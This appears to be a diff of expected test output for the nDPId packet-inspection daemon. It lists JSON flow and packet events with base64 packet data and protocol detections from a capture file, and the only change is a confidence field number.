00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1470104416958,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416958,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2cAAAERi4nAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":2,"flow_last_seen":1470104416959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416959,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxIAAAERB\/fAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1470104419061,"pkt":"ABxCjnAxTF4M6gNlCABFAACZI1ZAAFgGw0IfDVcBwKgFEAG70UpuASLeX6ylxYAYAJ4ivgAAAQEICp0wiHcaDujhFwMDAGCI1MTiGjgHtvACFdJlLWU4Nw2FMu4PdWcz\/2qZKGCdERXjWW+\/VFKnsNQj6agVS5OakWCEMlC4HzCUNHzoAeDAfMWTlTRJFP0wq7r0D4aYTL9j7QTQTC0wsTFBdRQvfIs="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104419061,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0qwZAAEAGU\/fAqAUQHw1XAdFKAbtfrKXFbgEjQ4AQD\/zVtQAAAQEIChoPq9GdMIh3"} 02035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"thread_ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7ijEjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1470104420438,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"thread_ts_msec":1470104420438,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1470104420540,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"thread_ts_msec":1470104420540,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1470104420541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1470104420541,"pkt":"AQBeAAD8PKn0WgOECABFAAA1H\/gAAAER9C\/AqAPs4AAA\/OlSFOsAIfhUE7wAAAABAAAAAAAAB3NvbnVzYXYAAAEAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1470104420541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104420541,"pkt":"\/\/\/\/\/\/\/\/rCILUFkxCABFAABEAABAAEARLlc7eNDa\/\/\/\/\/8PnB5sAMKByU3Uyb1ZTdDRBQUJIWlc1MGNtbGpaVjlCVUVOZlozVmxjM1FBYldVQQ=="} 00915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1470104422079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"thread_ts_msec":1470104422079,"pkt":"MzMAAAABwKC7c+tXht1gAAAAAVERgCABsCAABgAAwqC7\/\/5z61f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRLwf\/D9rVoADAoLtz61cgAbAgAAYAAMKgu\/\/+c+tXAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz61dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjYAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCojIz\/\/wAAUG9ydCA4AAAgAbAgAAYAAMKgu\/\/+c+tXQA=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1470104423202,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104423202,"pkt":"MzMAAQAC9FyJieYHht1gD8\/5ACwRAf6AAAAAAAAA9lyJ\/\/6J5gf\/AgAAAAAAAAAAAAAAAQACAiICIwAsGIELuXYqAAEADgABAAEeo3uS9FyJieYHAAYABAAXABgACAAC\/\/8="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1470104424738,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104424738,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6MAAIARUUPAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1470104425455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104425455,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6QAAIARUULAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 